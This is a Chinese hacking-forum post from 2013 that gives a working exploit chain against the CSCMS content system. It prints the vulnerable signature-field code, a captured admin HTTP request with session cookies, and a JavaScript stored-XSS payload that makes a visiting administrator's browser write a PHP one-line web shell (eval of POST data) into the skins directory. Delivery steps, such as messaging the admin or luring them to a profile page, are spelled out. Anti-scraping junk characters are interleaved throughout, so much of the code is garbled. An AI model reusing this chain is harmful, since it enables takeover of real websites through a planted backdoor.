|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
: ^, o. c1 h- @官网已经修补了,所以重新下了源码
; S8 i! c0 m! J# W9 ]/ \因为 后台登入 还需要认证码 所以 注入就没看了。
* o* ?, N2 s- i$ {存在 xss( i& c- X; N* u6 o
漏洞文件 user/member/skin_edit.php: M5 D' |$ K4 o5 v# h* j
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
5 }2 y# ?2 W, m5 n 0 }) n/ d, P+ S# ]! S
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>5 P! X* M! E# C
( ?( x' [$ `6 ^6 e+ O</textarea></td></tr>
; g: E$ d* d/ v5 R0 e , S- h+ O, d2 `" f
user/do.php
) C1 d! t/ q! ?' x, K! }. ? f* x* B
; l% k1 ~/ g/ }/ p0 ]# W
if($op=='zl'){ //资料
8 `* X$ Y/ p ?
! |# g( e ?6 O, R if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) - k' H& g s- L/ G9 D5 f
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
# S9 L/ L* Q: y3 r3 L5 u1 [- n' f $ w! | L( W! q/ U+ |
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
, f7 }, Y' J# W+ ]+ }1 ?- |5 Y
+ \: {2 m& j" |' K1 ^ CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'/ d- C# W1 S2 D* c7 `' q
where CS_Name='".$cscms_name."'";4 Q7 G7 @9 d) t2 O3 x$ T# \& ?3 g
% u. d# L" M! I) B) f# G: p
if($db->query($sql)){6 x0 _& m) R6 v7 e
6 _8 H- g1 u) q; J exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));; n0 E7 N5 X# @
, Q6 e! ^$ N+ d8 ^3 z; t/ e6 _ }else{
1 n+ P0 g7 d+ p9 [7 ]- y ! ^! W' t- e' y6 Y- _; Y2 y3 K
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
. K9 v! U( Q1 E0 q3 B! v! h) Y ! u: [0 {0 {' g3 u' K
}% X. S' K ]* Y/ e
! {7 r) t% k n1 c* m# `+ b, p+ T& w: m& `0 Y& j
没有 过滤导致xss产生。3 O2 y1 ~* Z, E2 G7 w
后台 看了下 很奇葩的是可以写任意格式文件。。$ F* {; e. j% o" Q h
抓包。。( A$ Z8 l% q& ^& N
* B" a/ L, g. N3 C5 H
% d5 [+ @7 W9 q% ]+ v3 S! N* B
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1; F( G$ y9 R8 Q" y) d; P
* z( W, h9 X/ @$ h% ]; ?+ p) AAccept: text/html, application/xhtml+xml, */*, x8 n/ A8 s4 z% W% ^$ w
( `7 J, w6 K7 Q" }4 q& ]Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php; B. _/ ]1 J4 R( n
1 K5 A& L% ?( x, c4 e' h
Accept-Language: zh-CN3 G9 K: G7 K* x- G4 x
" r3 S% U: K2 ?4 k" d& Z: YUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)7 P% u0 z8 {: C8 C: M
& T( O' i0 m* T1 @- y0 kContent-Type: application/x-www-form-urlencoded
* c+ M9 s! g. S* K. V' n - y/ b7 j2 @- {! R: y1 [
Accept-Encoding: gzip, deflate" Q. K e* J1 \0 B0 l6 c2 Z
) X! b: |- W3 P, D& E# v, [6 m9 r1 SHost: 127.0.0.1- T3 Q6 Q: n8 ^7 ?1 f! ?! g
" B* m/ q/ U0 Z) E9 K
Content-Length: 38
9 g- M6 ^5 Y3 i$ i $ J- E5 t( T$ q l7 G
DNT: 1; f0 E9 r4 @/ ^! l/ V
' X$ _5 j' R, s: C: e$ CConnection: Keep-Alive/ z" F$ R0 D/ T- Q
6 }" E+ p+ k* _ a* j: e7 \" A! ]
Cache-Control: no-cache
$ g( t$ D+ E$ @- ^, c2 W % v+ W% |% J2 T! W) `- W
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f655944 Y0 ^3 G! s3 Z6 L! E0 ]( o5 }
9 t5 I6 K9 M. |. O
. I5 Q. [* H& Q# k! d5 ]
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
" F% C0 @4 X$ f9 N! w6 e& ^, a, a' e+ T0 w+ X% `! b
' K: L, E5 t5 O! e& w
$ [* n5 k3 T- I$ H2 E8 j/ _于是 构造js如下。
% {# T7 c( v E2 B8 E7 l8 r( f- K1 [) r: L# U/ p
本帖隐藏的内容<script>
* }* C. @4 E: o% ^8 o4 @- Z7 QthisTHost = top.location.hostname;
N4 ~4 A# |7 G5 C Z7 \
% j4 V) l8 y! c, ^ Y2 mthisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
0 ^; s7 |1 {' m( {1 P" U" s% h9 j, k4 u+ ~! x 3 A( m2 x) N, B( I" z: b
function PostSubmit(url, data, msg) {
/ }6 K" S5 s" X var postUrl = url;. N7 L) Y, e6 D
# v# f z& ~/ m, j7 G( d var postData = data; ! S) S4 g8 ^* r5 X/ E: y
var msgData = msg;
4 x H4 c* s8 l var ExportForm = document.createElement("FORM"); , j |! H+ N: f5 E7 Q1 c% o
document.body.appendChild(ExportForm);
/ ]2 e) b* K5 ] c ExportForm.method = "POST"; : O! {& {# H* ~6 f( N& Z* ~
var newElement = document.createElement("input");
% m l [- K! w% x$ F newElement.setAttribute("name", "name");
6 I' @6 b9 ?, C& s7 | newElement.setAttribute("type", "hidden");
2 y" X- v0 s" F6 z& J9 T3 k var newElement2 = document.createElement("input");
. d) m4 I6 N9 A, _ newElement2.setAttribute("name", "content"); % S4 K M% [: ^( [9 ~! T' k5 [7 _0 w+ n
newElement2.setAttribute("type", "hidden");
1 T, l! L2 P- g$ M ExportForm.appendChild(newElement);
* n! E5 ]& k0 e5 _, X ExportForm.appendChild(newElement2);
. Z2 J; A2 g C4 Z: [% d4 i newElement.value = postData;
, G& B& i) P# q# }/ R' V: D newElement2.value = msgData;
% A8 V+ U! \ I: ` ExportForm.action = postUrl; ; P7 a- z$ k2 F# P# u
ExportForm.submit();
' z, a0 h/ T7 v% C( q2 ~% g};6 W* L4 [# y0 ]! J1 d/ O
$ l8 T4 ~0 j- c. oPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
& h7 Y$ o( C2 s* Y% F! u ' }. o8 Q2 }7 F& R
</script>. D1 n5 S( {* r; D8 {) V1 Q$ W
" m: B5 t: g$ J! ]
3 f# M+ ^# b; l A6 g n4 E7 F
) f6 Q- p' Y* Q* u. S4 t2 \$ ^http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入* ] G8 U( f3 |+ Q
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
- Q: s/ @# f- r/ h0 d, M就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
; o7 n& O4 H1 U- L3 O6 p
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对